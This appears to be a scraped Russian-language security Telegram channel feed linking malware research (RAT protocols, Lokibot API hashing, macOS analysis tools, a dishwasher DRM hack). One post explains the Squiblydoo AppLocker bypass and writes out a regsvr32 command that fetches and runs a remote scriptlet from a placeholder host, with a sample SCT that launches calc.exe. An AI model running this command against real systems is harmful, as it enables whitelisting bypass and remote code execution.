Announcing Rust for Windows v0.9
https://blogs.windows.com/windowsdeveloper/2021/05/06/announcing-rust-for-windows-v0-9/
https://blogs.windows.com/windowsdeveloper/2021/05/06/announcing-rust-for-windows-v0-9/
Windows Developer Blog
Announcing Rust for Windows v0.9
Rust for Windows v0.9 has recently been released and includes full consumption support, along with several other updates! With completed consumption support, you can now call any Windows APIs (past, present, and futur
ALEXANDREBORGES_DEFCON_2019.pdf
3.1 MB
.NET MALWARE THREAT:
INTERNALS AND
REVERSING
INTERNALS AND
REVERSING
Forwarded from Cybred
Нежелание тратить львиную часть зарплаты на кассеты для посудомоечной машины привели к написанию этого невероятно годного ресерча.
https://telegra.ph/Vzlom-DRM-Umnoj-posudomoechnoj-mashiny-05-04
https://telegra.ph/Vzlom-DRM-Umnoj-posudomoechnoj-mashiny-05-04
Telegraph
Взлом DRM Умной посудомоечной машины
Еще в январе 2021 года я увидел обзор от Techmoan на посудомоечную машину Bob компании Daan Tech. Боб - это элегантная и компактная посудомоечная машина, способная уместиться на столешнице, со встроенным резервуаром для воды, который можно наполнять вручную…
Обзор кастомных протоколов общения с c2 популярных rat
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
Zscaler
Analysis of top non-HTTP/S threats | Zscaler Blog
In this article, Zscaler security research team dissect the custom protocols used in some of the most prevalent RATs seen in recent campaigns. Read more.
Lokibot - популярный стилер, одной из характерных черт которого является api hashing
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Forwarded from vx-underground
Список инструментов для malware analysis macos малвари
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
Order of Six Angles
Squiblydoo AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe…
Пример sct скрипта
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
Forwarded from Inside
Выпуск 3.2021
Защита IoT-устройств от распределенных атак типа «отказ в обслуживании».
Пожертвования каналу -> 1PsEMi5BrRRTydzStHQ41gir2iugSEPcuU
Защита IoT-устройств от распределенных атак типа «отказ в обслуживании».
Пожертвования каналу -> 1PsEMi5BrRRTydzStHQ41gir2iugSEPcuU